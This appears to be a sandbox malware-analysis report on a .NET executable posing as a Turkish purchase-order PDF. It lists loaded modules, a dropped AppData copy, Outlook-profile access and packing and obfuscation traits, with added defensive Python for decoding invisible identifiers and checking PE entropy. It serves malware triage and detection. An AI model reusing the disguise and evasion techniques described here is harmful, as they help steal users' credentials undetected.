Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: edputil.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.cs .Net Code: XbrepSfTju System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.6220000.8.raw.unpack, tiGbCdWd4bev0iB2DA.cs .Net Code: XbrepSfTju System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.28887b4.1.raw.unpack, LoginForm.cs .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.50c0000.6.raw.unpack, LoginForm.cs .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
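The four findings above show the unpacked stages calling System.Reflection.Assembly.Load(byte[]), the standard way a .NET packer runs a decrypted next stage without writing it to disk (amsi.dll appearing in the dropped file's loaded-module list is consistent with the .NET Framework 4.8 CLR handing such byte-array assemblies to AMSI before they execute). The method in LoginForm.cs has a name made entirely of "_XXXX" escapes. Those are the report's rendering of U+200B..U+200F, U+202A..U+202E and U+206A..U+206F, zero-width and bidirectional formatting characters (Unicode category Cf) that the C# language permits inside identifiers and that CLR metadata stores unchanged, so the method carries a legal name that most tools display as nothing. The Python below is an added example, not code from the Joe Sandbox report or from the sample; it decodes the rendered name back into code points, classifies each one, and flags identifiers that are mostly invisible. The 0.5 threshold and the helper names are assumptions of this example.

```python
import re
import unicodedata

# Method name copied from the LoginForm.cs finding above, exactly as the report
# rendered it: every "_XXXX" token stands for one UTF-16 code unit.
RENDERED_LOGINFORM_METHOD = (
    "_206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A"
    "_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B"
    "_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E"
)

# A rendered name consisting only of "_XXXX" escapes. Names with ordinary
# letters (XbrepSfTju, LoginForm) do not match and are taken literally.
ESCAPED_NAME = re.compile(r"^(?:_[0-9A-Fa-f]{4})+$")
ESCAPE_TOKEN = re.compile(r"_([0-9A-Fa-f]{4})")


def decode_identifier(rendered: str) -> str:
    """Recover the real identifier from the "_XXXX" rendering.

    Names without escapes are returned unchanged. Each token is treated as a
    full code point (no surrogate pairs occur in the names on this page).
    """
    if not ESCAPED_NAME.match(rendered):
        return rendered
    return "".join(chr(int(hex4, 16)) for hex4 in ESCAPE_TOKEN.findall(rendered))


def describe(identifier: str) -> list:
    """Per code point: (U+XXXX, Unicode general category, character name)."""
    return [
        (f"U+{ord(ch):04X}", unicodedata.category(ch), unicodedata.name(ch, "<unnamed>"))
        for ch in identifier
    ]


def invisible_ratio(identifier: str) -> float:
    """Share of code points that are format characters (category Cf).

    Cf covers zero-width joiners/spaces, the bidi embedding and override
    controls, and the deprecated U+206A..U+206F shaping controls. All of them
    are valid identifier-part characters in C# and all render as nothing.
    """
    if not identifier:
        return 0.0
    hidden = sum(1 for ch in identifier if unicodedata.category(ch) == "Cf")
    return hidden / len(identifier)


def suspicious_names(rendered_names: list, threshold: float = 0.5) -> list:
    """Return the rendered names whose decoded form is mostly invisible.

    The threshold is an assumption of this example; renamers that hide names
    this way usually emit identifiers that are 100% Cf, so it is not tight.
    """
    return [
        name for name in rendered_names
        if invisible_ratio(decode_identifier(name)) >= threshold
    ]


if __name__ == "__main__":
    real = decode_identifier(RENDERED_LOGINFORM_METHOD)
    print(f"{len(real)} code points, {invisible_ratio(real):.0%} invisible, "
          f"displays as {real!r}")
    for cp, category, name in describe(real)[:6]:
        print(f"  {cp} {category} {name}")
    print(suspicious_names(["LoginForm", "XbrepSfTju", RENDERED_LOGINFORM_METHOD]))
```

The same pass can be run over every type and member name exported from the unpacked dump; a class whose members are all Cf-only names is a renamer artifact, and, because the CLR compares names byte for byte, two methods that both "look blank" in a decompiler can still be distinct overloads from the runtime's point of view.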
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Static PE information: TimeDateStamp 0xAA4E3A0D [Sat Jul 17 01:29:49 2060 UTC] (in the future)
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 10_2_05AF64E9 push ebx; retf 10_2_05AF64EA
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 10_2_05AF5CB6 push 8B05AF5Dh; iretd 10_2_05AF5CBD
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 13_2_01314779 push esi; iretd 13_2_0131477A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 13_2_0131477B push ebp; iretd 13_2_01314782
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 13_2_013147B1 push esi; iretd 13_2_013147B2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 13_2_013146B8 push edx; iretd 13_2_013146BA
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 13_2_013146BB push edx; iretd 13_2_013146C2
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 13_2_0131AD27 pushfd ; iretd 13_2_0131AD2A
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe Code function: 13_2_0131AD2B pushfd ; iretd 13_2_0131AD32
                    Source: baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe Static PE information: section name: .text entropy: 7.925581129662268
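The timestamp and section-entropy findings above are two of the cheapest static checks to reproduce in a triage script: 0xAA4E3A0D decodes to a date in 2060, and a .text section at 7.93 bits per byte is holding compressed or encrypted data, not compiled code (real x86 or CIL code lands well below that). The Python below is an added example, not from the Joe Sandbox report: a dependency-free parser that reads TimeDateStamp and the section table straight from the COFF header, computes per-section Shannon entropy, and classifies the timestamp. Because no sample is shipped with this page, it builds a constructed minimal PE (the report's timestamp plus a perfectly uniform .text section) as its offline input; build_sample_pe(), the 7.0 bits-per-byte threshold and the verdict strings are assumptions of this example. One caveat a practitioner should keep in mind: a future timestamp on its own is weak evidence, since deterministic builds of .NET assemblies fill this field with a hash of the build inputs rather than a clock value, so it should be weighed together with the entropy and the behavioural findings rather than alone.

```python
import math
import struct
from collections import Counter
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Assumption: above this many bits per byte a section is treated as packed.
PACKED_ENTROPY = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means every byte value is equally frequent."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def parse_pe(blob: bytes):
    """Return (TimeDateStamp, [(section name, raw bytes), ...]) from a PE file image."""
    if blob[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes).
    _machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", blob, coff)
    table = coff + 20 + opt_size
    sections = []
    for i in range(nsections):
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
        name, _vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), blob[raw_ptr:raw_ptr + raw_size]))
    return timestamp, sections


def assess_timestamp(timestamp: int, now=None):
    """Classify a PE TimeDateStamp; returns (UTC datetime, verdict)."""
    now = now or datetime.now(timezone.utc)
    when = EPOCH + timedelta(seconds=timestamp)  # portable past 2038
    if timestamp == 0:
        return when, "zeroed"
    if when > now:
        return when, "future"
    return when, "plausible"


def triage(blob: bytes, now=None) -> dict:
    """Static summary: timestamp verdict plus per-section entropy and the packed set."""
    timestamp, sections = parse_pe(blob)
    when, verdict = assess_timestamp(timestamp, now)
    entropies = {name: shannon_entropy(raw) for name, raw in sections}
    return {
        "timestamp": f"0x{timestamp:08X}",
        "compiled": when.strftime("%a %b %d %H:%M:%S %Y UTC"),
        "timestamp_verdict": verdict,
        "entropy": entropies,
        "suspect_sections": [n for n, e in entropies.items() if e > PACKED_ENTROPY],
    }


def build_sample_pe(timestamp: int, text: bytes) -> bytes:
    """Constructed test input: a minimal, non-executable PE with one .text section.

    Only the fields parse_pe() reads are populated and there is no optional
    header, so this is enough to exercise the parser but will not load.
    """
    e_lfanew, raw_ptr = 0x40, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 0, 0x0102)
    section = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x2000, len(text), raw_ptr,
                          0, 0, 0, 0, 0x60000020)
    header = dos + b"PE\0\0" + coff + section
    return header + b"\0" * (raw_ptr - len(header)) + text


if __name__ == "__main__":
    # The report's timestamp paired with a section whose byte histogram is flat
    # (entropy exactly 8.0), the textbook signature of an encrypted payload.
    sample = build_sample_pe(0xAA4E3A0D, bytes(range(256)) * 4)
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

Pointing parse_pe() at a real file (open it in binary mode and pass the bytes) gives the same dictionary for the actual sample; the "compiled" string for 0xAA4E3A0D matches the report's "Sat Jul 17 01:29:49 2060 UTC" exactly.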
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, mPiN3BBGyN7Z8OcVG1.cs High entropy of concatenated method names: 'MoZgAVw4EH', 'dgsgtbg38C', 'b1cgbwE0ji', 'iWIgK3n6AP', 'KkngaGDruw', 'OHBgTn0G81', 'TDog5kwoCt', 'qwIgvPEB12', 'JlAglVpj4p', 'vcQg1C6pKv'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, rvSQ3JDQBZfG7TKqRV.cs High entropy of concatenated method names: 'WkbybJwtnm', 'KEtyKDqej2', 'e4YysLhycr', 'RAEyflIq3m', 'jamyGsaaIG', 'cmWyJHf20h', 'UdNyN9bCqj', 'IayyHTwbCc', 'nkjycvSmwZ', 'yoQy8npDdZ'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, d8xT5fphNsaLn4YbFg.cs High entropy of concatenated method names: 'YZ96YdGBNj', 'sX06mrR5Yk', 'K4T6pSpYNv', 'LOl6AIdmrX', 'CUN6nAY3kc', 'aGT6tBUEuS', 'UR56WIDmhq', 'O7g6byFvRs', 'BI46K56XKa', 'Sbm6BpdWR1'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, Xty0axU2Oxr1MyKjtV.cs High entropy of concatenated method names: 'xxePrelrt3', 'DtkP4VWX59', 'o00PFFFndG', 'sYQP6hDe6y', 'GirP3QHk0B', 'VtHFDQfIJ9', 'vWqFSNrt0S', 'VOYFuL8Y13', 'WgiFkFkA2P', 'AV0FdNXKFw'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, fPPIjUKcIE0AwPG6ao.cs High entropy of concatenated method names: 'gQq5EnSY0T', 'SFf5ibKM3d', 'ToString', 'Dq55InXdKw', 'xpf54IUW1e', 'YfQ5gdlkjT', 'fb95FmVXsE', 'kKO5PEQxdQ', 'X7V56mlbEp', 'lB053yQARe'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, zCBZmxLdu5DgsAtfw8.cs High entropy of concatenated method names: 'S0vvI4BwgW', 'pXPv42fAb4', 'o54vgGg9ki', 'lU1vFOt87t', 'PS8vPolYJ1', 'TNKv6IWGjN', 'vKMv3BSnY6', 'd98v941gZq', 'Cx6vEUWVRE', 'WUavi3sAOg'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, wfZwUg997eENp4pIky.cs High entropy of concatenated method names: 'uCA5kbpaNI', 'sV9507Lc9y', 'uW9v290cSK', 'VJ5vXF65U3', 'NeQ58w9hN3', 'LAQ5xGSAF1', 'xaR5LlqpvW', 'rhi5qt3dvN', 'RjF5Z4jVuy', 'BwS5RElftT'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, B80lBRzEuJQ2gVHNPN.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LB5lyEU4Wf', 'abWlaIvBle', 'fnXlTVLg7Y', 'iS6l59tnLs', 'weblvKo16T', 'lgFllow211', 'zVKl19KOSi'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, I3npwBYQQFuv23683C.cs High entropy of concatenated method names: 'Dispose', 'YEyXdovVy3', 'cJ1Mf6cgnO', 'vi377Gjyn0', 'EqoX03pIa5', 'HT3XzUNTMS', 'ProcessDialogKey', 'M5XM2I8gTJ', 'LauMXuIpdO', 'otSMMq85wh'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, Eg53fQuaiL3x0mTkch.cs High entropy of concatenated method names: 'i98FnP2V2o', 'c0WFWuB4HT', 'baigQOyrZ7', 'tUtgGHwHgv', 'ktmgJE9GnD', 'lVDgoDhrwv', 'CedgN56aSP', 'jAdgHdJr8I', 'BIqghbcdg6', 'w5egcOrtp2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, bgc4mo1Zqy4jEgX7FWt.cs High entropy of concatenated method names: 'Kj9lYgTn1Z', 'SYUlmB4tSJ', 'FCtlpAfVId', 'e3elAOwOXT', 'cTTln7qqmf', 'nmQltpIv8j', 'csDlWbqKAn', 'Ei6lb9xsxA', 'hqplKBV1HS', 'VEIlBLJdiD'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, v6uhagkvHfUiDoPBAd.cs High entropy of concatenated method names: 'okm6ICFfnm', 'gyN6g0n3qQ', 'u6j6PlYo5E', 'uuPP0ncv0Z', 'AuBPzoKMFN', 'M8q62X3iJG', 'Rjq6XA87wW', 'oo56MBCFHp', 'jLU6jY3BLi', 'Ohu6ey33XO'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, x6JxON1fwtwdPv1xTFC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'r7G1qyhX7A', 'II81Z91QFb', 'txD1RcIZVE', 'GNt1OcUQar', 'BMM1DfKuRV', 'Txn1SHNL32', 'Fp31uwPxnP'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, ntOxXKIEe5iRt4Qe5q.cs High entropy of concatenated method names: 'BJfp6K3y4', 'udFAjHXac', 'xU4tgXgXE', 'u5vWMCBb9', 'jreKZ2qXL', 'bwfBQWgCP', 'ayfG47kdllTypplx7N', 'xcdbQeAQiFtNTEYDTt', 'HEIvVbrSx', 'O7d1wJbA2'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, BIfda5lRrt3Eiso9an.cs High entropy of concatenated method names: 'Eg04qm49oX', 'TIt4Z8Qlyf', 'UMa4R3fm82', 'kac4OUuKdk', 'Wdf4DSV9aD', 'G7V4Sihgmp', 'w7M4ufvsLm', 'TL34k36rvX', 'MTZ4dYNSJH', 'KCL40y22cd'
                    Source: 5.2.baymarhavuzculuk Sat#U0131nalma Sipari#U015fi 20230331,pdf.exe.3c35ad0.3.raw.unpack, tiGbCdWd4bev0iB2DA.cs High entropy of concatenated method names: 'iSZjrFLIIU', 'pc4jIybYG3', 'G73j4DnXe1', 'eKnjgq4lYe', 'cpbjF8yDPn', 'FT6jPiMRQC', 'Xu8j6rL2D1', 'zG7j3vuZ6g', 'pvej9DimmY', 'P5LjEediRc'
